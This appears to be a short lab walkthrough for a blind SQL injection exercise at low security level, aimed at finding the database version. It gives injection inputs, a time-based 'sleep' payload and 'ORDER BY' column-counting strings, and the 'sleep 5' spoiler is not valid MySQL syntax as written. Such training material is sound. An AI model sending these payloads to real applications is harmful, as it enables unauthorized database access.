Skip to main content

SQL Injection (Blind)

Objective

Find the version of the SQL database software through a blind SQL attack

Security Level: Low

The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able to execute any SQL query they wish. Spoiler: ?id=1' AND sleep 5&Submit=Submit.

1

Let's check if user ID 1 exists.

2

We can now provide the following inputs to figure out the number of columns in the table.

1' ORDER BY 1#
1' ORDER BY 2# 
1' ORDER BY 3#

When we enter the third input, we get a blank screen. This means that there are two columns in the table.